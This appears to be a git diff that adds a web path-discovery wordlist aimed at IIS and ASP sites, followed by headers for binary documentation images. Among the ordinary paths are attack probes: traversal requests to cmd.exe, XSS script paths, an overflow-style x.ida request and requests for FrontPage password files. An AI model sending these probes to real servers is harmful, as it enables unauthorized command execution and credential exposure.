+/administrator/
+admin_jhdown.asp
+admin_jhglzn.asp
+admin_jiaoxue.asp
+admin_jihua.asp
+admin_js.asp
+admin_keji.asp
+/Admin/knowledge/dsmgr/users/GroupManager.asp
+/Admin/knowledge/dsmgr/users/UserManager.asp
+admin_left.asp
+admin_link.asp
+Admin_list.asp
+admin_lockuser.asp
+Admin_Login.asp
+adminLogin.aspx
+Admin_Menu.asp
+AdminMenu.asp
+Admin_ModiPwd.asp
+admin_neibu.asp
+admin_news.asp
+admin_other.asp
+admin_pic.asp
+admin_postings.asp
+Admin_Private.asp
+admin_save.asp
+Admin_Style.asp
+admin_upfile.asp
+admin_upload.asp
+Admin_UploadFile.asp
+admin_user.asp
+admin_view.asp
+admin_viewok.asp
+admin_vote.asp
+admin_web.asp
+admin_weiyuanhui.asp
+admin_xiangmu.asp
+admin_xmglzn.asp
+admin_xsglzn.asp
+admin_xuebao.asp
+admin_xueshu.asp
+admin_zhengzhi.asp
+admin_zhidu.asp
+admin_zhiliang.asp
+admin_zlglzn.asp
+/adovbs.inc
+/adsamples/
+adsamples
+adsamples/
+/AdvWorks/equipment/catalog_type.asp
+/ajfhasdfgsagfakjhgd
+AllDel.asp
+announce.asp
+announcements.asp
+Api_Config.asp
+app.aspx
+/archi~1/
+/Archi~1/
+/archiv~1/
+archiv~1
+archiv~1/
+archive.aspx
+array.asp
+article.asp
+Article.aspx
+articles.asp
+/asp/
+asp
+asp/
+aspcheck.asp
+/aspnet_client/
+aspnet_client
+aspnet_client/
+/aspnet_files/
+/asps/
+asps
+asps/
+/ASPSamp/AdvWorks/equipment/catalog_type.asp
+asptemplate.asp
+Atendimento.asp
+/_AuthChangeUrl?
+BadWord.asp
+base64.asp
+base.asp
+basexml.asp
+basics.asp
+BbsFace.asp
+/bin/
+bin
+bin/
+/bins/
+bins
+bins/
+blank.asp
+Blog.aspx
+Blogroll.aspx
+Blogs.aspx
+bmjj.asp
+Board.asp
+Boardhelp.asp
+boardpermission.asp
+BoardSetting.asp
+boardstat.asp
+BoardUnite.asp
+BokeAdmin.asp
+BokeApply.asp
+Boke.asp
+BokeDescription.asp
+BokeIndex.asp
+BokeManage.asp
+Bokepostings.asp
+BokeRss.asp
+BokeSearch.asp
+BokeUpload.asp
+bookInfo.aspx
+Book_info.aspx
+BookItemsAdmin.aspx
+bottom.asp
+Bugs.aspx
+Buy.aspx
+BuyPost.asp
+cache.asp
+calendar.asp
+Captcha.asp
+Catalog.aspx
+Categories.aspx
+CategoryAdmin.aspx
+category.asp
+Category.aspx
+CategoryDAO.asp
+/certcontrol/
+/certenroll/
+/certsrv/
+/cfide/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+/CFIDE/Administrator/startstop.html
+cggl.asp
+cgglzn.asp
+/cgi/
+/cgi-bin/
+cgi-bin
+cgi-bin/
+/cgi-bin/a1stats/a1disp.cgi
+/cgi-bin/htimage.exe?2,2
+/cgi-bin/htmlscript
+/cgi-bin/imagemap.exe?2,2
+Challenge.asp
+Chan_Const.asp
+change_pass.asp
+ChangePassword.asp
+ChangePassword.aspx
+ChangePasswordSuccess.aspx
+ChangePwd.aspx
+char.asp
+chat.asp
+/checkapache.html
+check.asp
+checkcode.asp
+CheckInput.asp
+checklogin.asp
+Checkout.aspx
+chkinput.asp
+ChkLogin.asp
+/citrix/
+/citrix/AccessPlatform/auth/
+/citrix/AccessPlatform/auth/clientscripts/
+/Citrix//AccessPlatform/auth/clientscripts/cookies.js 
+/Citrix/AccessPlatform/auth/clientscripts/login.js 
+/Citrix/PNAgent/config.xml
+class.asp
+class_upload.asp
+ClearCache.asp
+/clocktower
+cls_article.asp
+Cls_DvApi.asp
+Cls_Main.asp
+Cls_System.asp
+clsUpload.asp
+/cmsample/
+cmsample
+cmsample/
+code.asp
+ColorPicker.aspx
+commands.asp
+comment.asp
+Comment.aspx
+Comments.aspx
+/common/
+common
+common/
+/common~1/
+common~1
+common~1/
+_common.asp
+common.asp
+config.asp
+Confirm.aspx
+Confirmation.aspx
+conn1.asp
+Conn.asp
+ConnBook.asp
+ConnDB.asp
+connection.asp
+connector.asp
+connector.aspx
+ConnJobs.asp
+ConnNew.asp
+ConnNews.asp
+ConnOther.asp
+ConnProdu.asp
+Conntaolun.asp
+Connwl.asp
+const.asp
+contact.asp
+Contact.aspx
+ContactUs.aspx
+Content.aspx
+control.asp
+ControlPanel.aspx
+Controls.aspx
+cookies.asp
+copyright.asp
+core.asp
+countvote.asp
+CreateAccount.aspx
+Create.aspx
+CreateUser.aspx
+CreateVirtualServer.aspx
+CS_ClassTemplate.aspx
+CS_DynamicScaffold.aspx
+CS_GeneratedScaffoldCodeBehind.aspx
+CS_GeneratedScaffoldMarkup.aspx
+CS_ODSController.aspx
+CSS.asp
+CS_SPTemplate.aspx
+CS_StructsTemplate.aspx
+CS_ViewTemplate.aspx
+daima.asp
+Dashboard.aspx
+Data.asp
+Data.aspx
+date.asp
+/db/
+db
+db/
+db.asp
+debug.asp
+DeCode.asp
+Default2.aspx
+default.asp
+Default.aspx
+del.asp
+delete.asp
+Delete.aspx
+Deleted.aspx
+del_user.asp
+delvote.asp
+demo.asp
+Detail.aspx
+Details.aspx
+dir.inc.asp
+dispbbs.asp
+Display.aspx
+dispuser.asp
+doc_add.asp
+document.asp
+/domcfg.nsf/?open
+down.asp
+download.asp
+download.aspx
+DownloadFile.aspx
+downloadlist.asp
+DrawMagicFace.asp
+duiwu.asp
+Dv_ClsMain.asp
+Dv_ClsOther.asp
+dv_dpo.asp
+Dv_GetCode.asp
+Dv_News.asp
+Dv_News_Demo.asp
+Dv_NewsView.asp
+Dv_ubbcode.asp
+dzbl_del.asp
+dzbl_List.asp
+easp.asp
+edit.asp
+Edit.aspx
+EditEvent.aspx
+EditGalleries.aspx
+EditImage.aspx
+Editor.aspx
+EditProfile.aspx
+edit_user.asp
+EditUser.aspx
+EditVersion.aspx
+Email.asp
+Email_Cls.asp
+email_word.asp
+en.asp
+eokedit1.asp
+eokedit.asp
+error404.aspx
+error.asp
+Error.aspx
+ErrorPage.aspx
+errors.asp
+ErrorsGridView.aspx
+ErrorsRssView.aspx
+eWebEditor.asp
+/Exadmin/
+example.asp
+/Exchange/
+/exchange/root.asp
+/ExchWeb/
+Exit.asp
+export.asp
+Export.aspx
+FAQ.aspx
+favlist.asp
+fckeditor.asp
+feed.asp
+Feed.aspx
+file_add_db.asp
+File_Admin_AddNew.asp
+File_Admin_List.asp
+File_Admin_Modify.asp
+File_Admin_Modify_save.asp
+File_Admin_News_Del.asp
+file.asp
+FileManager.aspx
+fileshow.asp
+FileUpload.aspx
+FillNode.aspx
+flash.asp
+flash_play.asp
+Foot.asp
+footer.asp
+forgot_password.asp
+ForgotPassword.aspx
+form.asp
+Form.aspx
+FORMAT.asp
+ForumAds.asp
+/forum_arc.asp
+/forum.asp
+Forum.aspx
+ForumNewsSetting.asp
+ForumPay.asp
+/forum_professionnel.asp
+Forums.aspx
+/_fpclass/
+fpdf.asp
+/fpsample/
+fpsample
+fpsample/
+FreeASPUpload.asp
+friend.asp
+friendlist.asp
+Friends.aspx
+ftb.imagegallery.aspx
+func.asp
+function.asp
+functions.asp
+Gallery.aspx
+gbook.asp
+gdAdmin.asp
+gdadmin_Save.asp
+Generate.aspx
+get.asp
+GetChallengeWord.asp
+GetCode.asp
+ggnews.asp
+glml.asp
+Global.asp
+glxz.asp
+glzn.asp
+gonggao.asp
+grade.asp
+Group.asp
+GroupPermission.asp
+Groups.aspx
+guestbook.asp
+gywm_Modify.asp
+gywm_Modify_Save.asp
+head.asp
+header.asp
+/help/
+help
+help/
+Help.asp
+Help.aspx
+HelpRaw.aspx
+helpview.asp
+history.aspx
+Home.aspx
+IDWindow.aspx
+/iiasdmpwd/
+/iisadmin/
+iisadmin
+iisadmin/
+iisadmpwd
+iisadmpwd/
+/iisadmpwd/achg.htr
+/iisadmpwd/aexp2b.htr
+/iisadmpwd/aexp2.htr
+/iisadmpwd/aexp3.htr
+/iisadmpwd/aexp4b.htr
+/iisadmpwd/aexp4.htr
+/iisadmpwd/aexp.htr
+/iisadmpwd/anot3.htr
+/iisadmpwd/anot.htr
+/iishelp/
+iishelp
+iishelp/
+/iishelp/iis/misc/default.asp
+/iissamples/
+iissamples
+iissamples/
+/iissamples/exair/howitworks/Code.asp
+/iissamples/exair/howitworks/Codebrw1.asp
+/iissamples/exair/howitworks/Codebrws.asp
+/iissamples/sdk/asp/docs/codebrw2.asp
+/iissamples/sdk/asp/docs/codebrws.asp
+/iissamples/sdk/asp/docs/CodeBrws.asp
+ImageGallery.aspx
+/images/
+images
+images/
+images.asp
+img.asp
+imgnews.asp
+/imprimer.asp
+inc.asp
+inc_config.asp
+inc_connection.asp
+inc_header.asp
+inc_ilanlar.asp
+inc_language.asp
+include.asp
+/includes/adovbs.inc
+index1.asp
+index.asp
+Index.aspx
+indexnew.asp
+/index.php
+/index.shtml
+/inetpub/
+inetpub
+inetpub/
+/inetsrv/
+inetsrv
+inetsrv/
+Info.asp
+Info.aspx
+InfoList.asp
+Init.asp
+Inscription.aspx
+insert.asp
+insidelist.asp
+insidenews.asp
+install.asp
+install.aspx
+interface.asp
+io.asp
+/isapi/
+isapi
+isapi/
+item.asp
+Item.aspx
+Items.aspx
+jgjs.asp
+jhgl.asp
+jhglzn.asp
+JobAdmin.asp
+Job.asp
+JobsAdmin_AboutUs.asp
+JobsAdmin_AboutUs_Save.asp
+JobsAdmin_Job.asp
+JobsAdmin_Job_Del.asp
+JobsAdmin_Job_Modify.asp
+JobsAdmin_Job_Publish.asp
+JobsAdmin_Job_Save.asp
+JobsAdmin_Job_Update.asp
+JobsAdmin_Person.asp
+JobsAdmin_Person_Del.asp
+JobsAdmin_Person_Info.asp
+Jobs.aspx
+JoinVipGroup.asp
+JSON_2.0.2.asp
+JSON.asp
+jsonParser.asp
+jsonRpcServer.asp
+JSON_UTIL_0.1.1.asp
+jxnews.asp
+jxpj.asp
+KeepAlive.aspx
+Keywords.asp
+keywords.aspx
+Label.asp
+language.asp
+/_layouts/alllibs.htm
+/_layouts/settings.htm
+/_layouts/userinfo.htm
+left1.asp
+left2.asp
+left3.asp
+left4.asp
+left5.asp
+left.asp
+Link.asp
+links.asp
+Links.aspx
+list.asp
+List.aspx
+liuyan_Del.asp
+liuyan_Del_en.asp
+liuyan_List.asp
+liuyan_List_en.asp
+liuyan_show.asp
+liuyan_show_en.asp
+liwei.asp
+LoadIndexKeywords.aspx
+Loadservoces.asp
+loadtree1.asp
+loadtree.asp
+location.asp
+LockIP.asp
+Log.asp
+Log.aspx
+login.asp
+Login.aspx
+LogOff.asp
+Logoff.aspx
+LogOn.aspx
+logout.asp
+Logout.aspx
+lostpass.asp
+lyCode.asp
+Mail.aspx
+/Mail/smtp/Admin/smadv.asp
+main.asp
+Main.aspx
+MainFeed.aspx
+manage.asp
+manage_user.asp
+ManageUsers.aspx
+/market
+math.asp
+md5.asp
+mdb.asp
+member.asp
+/_mem_bin/
+_mem_bin
+_mem_bin/
+/_mem_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+/_mem_bin/autoconfig.asp
+/_mem_bin/formslogin.asp
+menu.asp
+Menu.aspx
+Message.asp
+Message.aspx
+Messages.aspx
+messanger.asp
+/Micros~1/
+Micros~1
+Micros~1/
+/Microsoft-Server-ActiveSync/
+mmAdmin.asp
+Mod_admin.asp
+modifyadd.asp
+modifypic.asp
+modifypic_news.asp
+modifypic_produ.asp
+modifyprodupic.asp
+Modules.aspx
+Mod_Vote.asp
+MoneyLog.asp
+monitor.asp
+Move.aspx
+movebloc.asp
+/msadc/
+msadc
+msadc/
+/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+/msadc/Samples/selector/showcode.asp
+/msdac/root.exe?/c+dir
+/mspress30
+music.asp
+myadmin.asp
+myfile.asp
+mymodify.asp
+MyPage.aspx
+Myplus.asp
+MyProfile.aspx
+myspace.asp
+Navigation.aspx
+/%NETHOOD%/
+newadmin_addnew.asp
+newadmin_addnew_save.asp
+newadmin.asp
+newadmin_list.asp
+NewAdmin_Modify.asp
+NewAdmin_Modify_Save.asp
+NewAdmin_New_Del.asp
+New.aspx
+newpass.asp
+NewsAdmin_AddNew.asp
+NewsAdmin_AddNew_Save.asp
+NewsAdmin_AddType.asp
+NewsAdmin.asp
+NewsAdmin_DelType.asp
+NewsAdmin_HomeAdd.asp
+NewsAdmin_HomeAdd_Save.asp
+NewsAdmin_Home.asp
+NewsAdmin_Home_Doing.asp
+NewsAdmin_Home_Modify.asp
+NewsAdmin_HomeModify_Save.asp
+NewsAdmin_Home_Pic.asp
+NewsAdmin_List.asp
+NewsAdmin_Modify1.asp
+NewsAdmin_Modify.asp
+NewsAdmin_Modify_Save.asp
+NewsAdmin_News_Del.asp
+NewsAdmin_Type.asp
+news.asp
+News.aspx
+NewsList.aspx
+newsshow.asp
+NewUser.aspx
+NotAuthorised.aspx
+Notes.aspx
+NotFound.aspx
+Notice.aspx
+/null.htw
+/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHilite
+/OMA/
+online.asp
+Options.aspx
+oracle.asp
+Order.aspx
+orderDetail.aspx
+OrderDetails.aspx
+OrderList.aspx
+Orders.aspx
+OtherAdmin.asp
+out.asp
+/OWA/
+page.asp
+Page.aspx
+Pages.aspx
+PageView.aspx
+passport.asp
+PasswordAdmin.asp
+Passwordadmin_Save.asp
+pay_boardlimited.asp
+Payment.aspx
+/pbserver/
+pbserver
+pbserver/
+/pbserver/pbserver.dll
+Person.aspx
+PhotoList.aspx
+pic.asp
+pic_List1.asp
+pic_List.asp
+PingServices.aspx
+pinyin.asp
+Plus.asp
+plus_check.asp
+plus_MagicFace_const.asp
+plus_Tools_Center.asp
+plus_Tools_const.asp
+Plus_Tools_Info.asp
+plus_Tools_InfoSetting.asp
+Plus_Tools_Magicface.asp
+plus_Tools_Magiclist.asp
+plus_Tools_pay.asp
+plus_Tools_postings.asp
+Plus_Tools_User.asp
+PollAdmin_add.asp
+PollAdmin_admin.asp
+PollAdmin.asp
+PollAdmin_delete.asp
+PollAdmin_display.asp
+PopUp.asp
+post.asp
+Post.aspx
+PostCls.asp
+PostData.asp
+/postinfo.html
+Posts.aspx
+post_upload.asp
+Preferences.aspx
+preview.asp
+/.printer
+/printers/
+printers
+printers/
+/_private
+_private
+_private/
+private.asp
+produAdmin_AddNew.asp
+produAdmin_AddNew_Save.asp
+ProduAdmin_Addpinpai.asp
+ProduAdmin_AddProdu.asp
+ProduAdmin_AddType.asp
+ProduAdmin.asp
+ProduAdmin_childpinpai.asp
+ProduAdmin_childpinpaiSave.asp
+ProduAdmin_childSave.asp
+ProduAdmin_childtype.asp
+ProduAdmin_daType.asp
+ProduAdmin_DelOrder.asp
+ProduAdmin_Delpinpai.asp
+ProduAdmin_DelProdu.asp
+ProduAdmin_DelType.asp
+produAdmin_List.asp
+produAdmin_Modify.asp
+ProduAdmin_Modify_Save.asp
+ProduAdmin_NewProdu.asp
+produAdmin_News_Del.asp
+ProduAdmin_Order.asp
+ProduAdmin_Order_See.asp
+ProduAdmin_pinpai.asp
+ProduAdmin_PubProdu.asp
+ProduAdmin_Type.asp
+ProduAdmin_xiaoType.asp
+product.asp
+Product.aspx
+products.aspx
+Profile.asp
+Profile.aspx
+Profiles.aspx
+/progra~1
+progra~1
+progra~1/
+/Progra~1
+Project.aspx
+Projects.aspx
+PropertyList.aspx
+PubAdmin.asp
+Pubadmin_Save.asp
+/Public/
+Publish.aspx
+/publisher
+query.asp
+Query.aspx
+Query_get.asp
+/qwertypoiu.htw
+/qwertypoiu.printer
+Receive.asp
+recherche.aspx
+Record.asp
+recycle.asp
+Redirect.aspx
+referrers.aspx
+reg.asp
+register.asp
+Register.aspx
+Registration.aspx
+reg_upload.asp
+Releases.aspx
+ReloadForumCache.asp
+reply.asp
+Report.aspx
+Reports.aspx
+Reserve.aspx
+Reset.asp
+ResetPassword.aspx
+result.asp
+Results.aspx
+right.asp
+Room.aspx
+RoomManager.aspx
+rss.asp
+RSS.aspx
+RssFeed.asp
+/rubrique.asp
+sample01.asp
+sample02.asp
+sample03.asp
+sample04.asp
+sample.aspx
+sampleposteddata.asp
+/samples/
+samples
+samples/
+saveadmin.asp
+save.asp
+Save.aspx
+Saved.aspx
+savepost.asp
+savevote.asp
+SayAdmin.asp
+SayAdmin_Del.asp
+ScheduleSlot.aspx
+scode.asp
+/~/<script>alert('XSS')</script>.asp
+/<script>alert('XSS')</script>.aspx
+/~/<script>alert('XSS')</script>.aspx
+/scripts/
+scripts
+scripts/
+scripts 
+scripts /
+/scripts/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+/scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir+c:\\
+/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\
+/scripts/cgimail.exe
+/scripts/convert.bas
+/scripts/counter.exe
+/scripts/fpcount.exe
+/scripts/iisadmin/ism.dll?http/dir
+/scripts/no-such-file.pl
+/scripts/root.exe?/c+dir
+/scripts/samples/
+scripts/samples
+scripts/samples/
+/scripts/samples/search/webhits.exe
+/scripts/tools/
+scripts/tools
+scripts/tools/
+/scripts/tools/getdrvs.exe
+/scripts/tools/newdsn.exe
+search.asp
+Search.aspx
+SearchHelp.aspx
+/search?NS-query-pat=..\..\..\..\..\boot.ini
+SearchResults.aspx
+Security.aspx
+selimage.asp
+Send.asp
+Send.aspx
+SendEmail.asp
+sendmail.asp
+service.asp
+services.aspx
+session.asp
+Setting.asp
+settings.asp
+Settings.aspx
+setup.asp
+Setup.aspx
+SetupVS.aspx
+sha1.asp
+shangchuan.asp
+/share/
+Shipping.aspx
+shopping_cart.aspx
+ShoppingCart.aspx
+showall.asp
+show.asp
+Show.aspx
+ShowcontentPic.asp
+showerr.asp
+ShowHeadPic.asp
+ShowImg.asp
+ShowNewsPic1.asp
+ShowNewsPic.asp
+ShowpinpaiPic1.asp
+ShowpinpaiPic.asp
+ShowProduPic.asp
+showvote111.asp
+showvote.asp
+showvotedetails1.asp
+ShowyingpinPic.asp
+SignIn.aspx
+Site.aspx
+sitemap.asp
+SiteMap.aspx
+/sites/
+sites
+sites/
+/siteserver/
+siteserver
+siteserver/
+/SiteServer/Admin
+/SiteServer/Admin/commerce/foundation/driver.asp
+/SiteServer/Admin/commerce/foundation/DSN.asp
+/SiteServer/admin/findvserver.asp
+/SiteServer/Admin/knowledge/dsmgr/default.asp
+/siteserver/publishing/viewcode.asp
+/SiteServer/Publishing/viewcode.asp
+SiteSettingsEdit.aspx
+SiteSettingsList.aspx
+/Sites/Knowledge/Membership/Inspiredtutorial/Viewcode.asp
+/Sites/Knowledge/Membership/Inspired/ViewCode.asp
+/Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
+/Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp
+/Sites/Samples/Knowledge/Push/ViewCode.asp
+/Sites/Samples/Knowledge/Search/ViewCode.asp
+smiley.asp
+soft.asp
+sql.asp
+Start.aspx
+Startup.asp
+stat.asp
+Statistics.aspx
+stats.asp
+Status.asp
+step1.asp
+string.asp
+StudentResult.aspx
+StudyResult.aspx
+stylesheet.aspx
+sysset.asp
+/system/
+system
+system/
+System.asp
+/system_web/
+system_web
+system_web/
+sysuser.asp
+Tables.aspx
+tabs.aspx
+tag.asp
+Tag.aspx
+TagMiniView.aspx
+tags.asp
+Tasks.aspx
+techlist.asp
+technews.asp
+Template.asp
+Templates.aspx
+templates_view.asp
+/test/
+test.asp
+test.aspx
+TestValidatonControls.aspx
+textbox.asp
+textbox_jj.asp
+textbox_news.asp
+textbox_produ.asp
+ThankYou.aspx
+/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=goatfart+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2goatfart.html&newdb=CREA
+top1.asp
+Top_admin.asp
+top.asp
+Top.aspx
+topic.asp
+TopicOther.asp
+track.asp
+/tsweb/
+ubb.asp
+ubbcode.asp
+Ubblist.asp
+ubbshow.asp
+UnitTests.aspx
+Update.asp
+Update.aspx
+Updater.aspx
+Update_User.asp
+upfile.asp
+upfile_class.asp
+upfile_lx.asp
+upfile_xx.asp
+UpImg.asp
+upload_5xsoft.asp
+upload_5xsoft.inc.asp
+upload.asp
+upload.aspx
+Upload_Class.asp
+uploader.asp
+UpLoadFile.aspx
+UpLoadList.asp
+upload_lx.asp
+UploadProperty.aspx
+upload_xx.asp
+UpUserFace.asp
+useraccount.aspx
+user.asp
+user_info.asp
+userinfo.asp
+userlist.asp
+UserList.aspx
+userManage.aspx
+UserManagement.aspx
+usermanager.asp
+UserPay.asp
+UserProfile.aspx
+userregmanager.asp
+UserRoleEdit.aspx
+UserRoleList.aspx
+UserRoles.aspx
+Users.aspx
+user_shenhe.asp
+usersms.asp
+utf-8.asp
+utf8.asp
+util.asp
+/vc30
+Version.asp
+ViewAll.aspx
+view.asp
+View.aspx
+viewer.aspx
+viewfile.asp
+ViewInfo.asp
+ViewPage1.aspx
+viewsavebody.asp
+VirtualServer.aspx
+voteadd.asp
+vote.asp
+Vote.aspx
+votedel.asp
+votedy.asp
+vote_function.asp
+votelist.asp
+Vote_List.asp
+votemodify.asp
+vote_save.asp
+votesave.asp
+vote_showcode.asp
+votetou.asp
+/_vti_adm/
+_vti_adm
+_vti_adm/
+/_vti_aut/
+_vti_aut
+_vti_aut/
+/_vti_bin/
+_vti_bin
+_vti_bin/
+/_vti_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+/_vti_bin/fpcount.exe?Page=default.asp|Image=3
+/_vti_bin/shtml.dll
+/_vti_bin/shtml.dll/asdfghjkl
+/_vti_bin/shtml.exe/qwertyuiop
+/_vti_bin/_vti_aut/dvwssr.dll
+/_vti_bin/_vti_aut/fp30reg.dll
+/_vti_bin/_vti_aut/fp30reg.dll?1234=X
+/_vti_cnf/
+_vti_cnf
+_vti_cnf/
+/_vti_log/
+_vti_log
+_vti_log/
+/_vti_pvt/
+_vti_pvt
+_vti_pvt/
+/_vti_pvt/administrator.pwd
+/_vti_pvt/administrators.pwd
+/_vti_pvt/authors.pwd
+/_vti_pvt/service.pwd
+/_vti_pvt/shtml.exe
+/_vti_pvt/users.pwd
+/_vti_script
+_vti_script
+_vti_script/
+/_vti_txt
+_vti_txt
+_vti_txt/
+wap.asp
+wdxz.asp
+Wealth.asp
+/web/
+web
+web/
+WebForm1.aspx
+/_WEB_INF/
+/WEB-INF/web.xml
+/webpub/
+webpub
+webpub/
+/WebSer~1
+WebSer~1
+WebSer~1/
+welcome.asp
+WidgetEditor.aspx
+/winnt/
+winnt
+winnt/
+/wwwroot/
+wwwroot
+wwwroot/1_0_2204_21
+wzgg_Modify.asp
+wzgg_Modify_Save.asp
+xbgl.asp
+xbnews.asp
+/x.cfm
+x.cfm
+xgadmin.asp
+xg.asp
+/x.htw
+/x.htx
+x.htx
+/x.ida
+x.ida
+/x.ida?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=X
+/x.idc
+x.idc
+/x.idq
+x.idq
+xmgl.asp
+xmglzn.asp
+xml.asp
+/x.pl
+x.pl
+xsgl.asp
+xsglzn.asp
+/x.shtml
+x.shtml
+xsnews.asp
+xswyh.asp
+zhengzhi.asp
+zhidu.asp
+zlgl.asp
+zlglzn.asp
diff --git a/.gitbook/assets/image (1).png b/.gitbook/assets/image (1).png
new file mode 100644
index 00000000..d0d8fd1c
Binary files /dev/null and b/.gitbook/assets/image (1).png differ
diff --git a/.gitbook/assets/image (10).png b/.gitbook/assets/image (10).png
new file mode 100644
index 00000000..169a0842
Binary files /dev/null and b/.gitbook/assets/image (10).png differ
diff --git a/.gitbook/assets/image (100).png b/.gitbook/assets/image (100).png
new file mode 100644
index 00000000..85f294a5
Binary files /dev/null and b/.gitbook/assets/image (100).png differ
diff --git a/.gitbook/assets/image (101).png b/.gitbook/assets/image (101).png
new file mode 100644
index 00000000..ad148394
Binary files /dev/null and b/.gitbook/assets/image (101).png differ
diff --git a/.gitbook/assets/image (102).png b/.gitbook/assets/image (102).png
new file mode 100644
index 00000000..63675cea
Binary files /dev/null and b/.gitbook/assets/image (102).png differ
diff --git a/.gitbook/assets/image (103).png b/.gitbook/assets/image (103).png
new file mode 100644
index 00000000..1493a89e
Binary files /dev/null and b/.gitbook/assets/image (103).png differ
diff --git a/.gitbook/assets/image (104).png b/.gitbook/assets/image (104).png
new file mode 100644
index 00000000..5dc69a4e
Binary files /dev/null and b/.gitbook/assets/image (104).png differ
diff --git a/.gitbook/assets/image (105).png b/.gitbook/assets/image (105).png
new file mode 100644
index 00000000..a2f6967a
Binary files /dev/null and b/.gitbook/assets/image (105).png differ
diff --git a/.gitbook/assets/image (106).png b/.gitbook/assets/image (106).png
new file mode 100644
index 00000000..eaefc365
Binary files /dev/null and b/.gitbook/assets/image (106).png differ
diff --git a/.gitbook/assets/image (107).png b/.gitbook/assets/image (107).png
new file mode 100644
index 00000000..5c489261
Binary files /dev/null and b/.gitbook/assets/image (107).png differ
diff --git a/.gitbook/assets/image (108).png b/.gitbook/assets/image (108).png
new file mode 100644
index 00000000..139d4b08
Binary files /dev/null and b/.gitbook/assets/image (108).png differ
diff --git a/.gitbook/assets/image (109).png b/.gitbook/assets/image (109).png
new file mode 100644
index 00000000..94ac7e19
Binary files /dev/null and b/.gitbook/assets/image (109).png differ
diff --git a/.gitbook/assets/image (11).png b/.gitbook/assets/image (11).png
new file mode 100644
index 00000000..f071911a
Binary files /dev/null and b/.gitbook/assets/image (11).png differ
diff --git a/.gitbook/assets/image (110).png b/.gitbook/assets/image (110).png
new file mode 100644
index 00000000..9fe1e166
Binary files /dev/null and b/.gitbook/assets/image (110).png differ
diff --git a/.gitbook/assets/image (111).png b/.gitbook/assets/image (111).png
new file mode 100644
index 00000000..db465b8e
Binary files /dev/null and b/.gitbook/assets/image (111).png differ
diff --git a/.gitbook/assets/image (112).png b/.gitbook/assets/image (112).png
new file mode 100644
index 00000000..6df70811
Binary files /dev/null and b/.gitbook/assets/image (112).png differ
diff --git a/.gitbook/assets/image (113).png b/.gitbook/assets/image (113).png
new file mode 100644
index 00000000..2f8a8d54
Binary files /dev/null and b/.gitbook/assets/image (113).png differ
diff --git a/.gitbook/assets/image (114).png b/.gitbook/assets/image (114).png
new file mode 100644
index 00000000..add6a58e
Binary files /dev/null and b/.gitbook/assets/image (114).png differ
diff --git a/.gitbook/assets/image (115).png b/.gitbook/assets/image (115).png
new file mode 100644
index 00000000..75bf9094
Binary files /dev/null and b/.gitbook/assets/image (115).png differ
diff --git a/.gitbook/assets/image (116).png b/.gitbook/assets/image (116).png
new file mode 100644
index 00000000..0f8af75b
Binary files /dev/null and b/.gitbook/assets/image (116).png differ
diff --git a/.gitbook/assets/image (117).png b/.gitbook/assets/image (117).png
new file mode 100644
index 00000000..c71025f8
Binary files /dev/null and b/.gitbook/assets/image (117).png differ
diff --git a/.gitbook/assets/image (118).png b/.gitbook/assets/image (118).png
new file mode 100644
index 00000000..71005852
Binary files /dev/null and b/.gitbook/assets/image (118).png differ
diff --git a/.gitbook/assets/image (119).png b/.gitbook/assets/image (119).png
new file mode 100644
index 00000000..e2f82d4d
Binary files /dev/null and b/.gitbook/assets/image (119).png differ
diff --git a/.gitbook/assets/image (12).png b/.gitbook/assets/image (12).png
new file mode 100644
index 00000000..26483327
Binary files /dev/null and b/.gitbook/assets/image (12).png differ
diff --git a/.gitbook/assets/image (120).png b/.gitbook/assets/image (120).png
new file mode 100644
index 00000000..5766ede1
Binary files /dev/null and b/.gitbook/assets/image (120).png differ
diff --git a/.gitbook/assets/image (121).png b/.gitbook/assets/image (121).png
new file mode 100644
index 00000000..a2ff0852
Binary files /dev/null and b/.gitbook/assets/image (121).png differ
diff --git a/.gitbook/assets/image (122).png b/.gitbook/assets/image (122).png
new file mode 100644
index 00000000..78cc16af
Binary files /dev/null and b/.gitbook/assets/image (122).png differ
diff --git a/.gitbook/assets/image (123).png b/.gitbook/assets/image (123).png
new file mode 100644
index 00000000..53dd523e
Binary files /dev/null and b/.gitbook/assets/image (123).png differ
diff --git a/.gitbook/assets/image (124).png b/.gitbook/assets/image (124).png
new file mode 100644
index 00000000..ceb0a0f9
Binary files /dev/null and b/.gitbook/assets/image (124).png differ
diff --git a/.gitbook/assets/image (125).png b/.gitbook/assets/image (125).png
new file mode 100644
index 00000000..34081bf3
Binary files /dev/null and b/.gitbook/assets/image (125).png differ
diff --git a/.gitbook/assets/image (126).png b/.gitbook/assets/image (126).png
new file mode 100644
index 00000000..742df294
Binary files /dev/null and b/.gitbook/assets/image (126).png differ
diff --git a/.gitbook/assets/image (127).png b/.gitbook/assets/image (127).png
new file mode 100644
index 00000000..4f397783
Binary files /dev/null and b/.gitbook/assets/image (127).png differ
diff --git a/.gitbook/assets/image (128).png b/.gitbook/assets/image (128).png
new file mode 100644
index 00000000..877c67db
Binary files /dev/null and b/.gitbook/assets/image (128).png differ
diff --git a/.gitbook/assets/image (129).png b/.gitbook/assets/image (129).png
new file mode 100644
index 00000000..22f23086
Binary files /dev/null and b/.gitbook/assets/image (129).png differ
diff --git a/.gitbook/assets/image (13).png b/.gitbook/assets/image (13).png
new file mode 100644
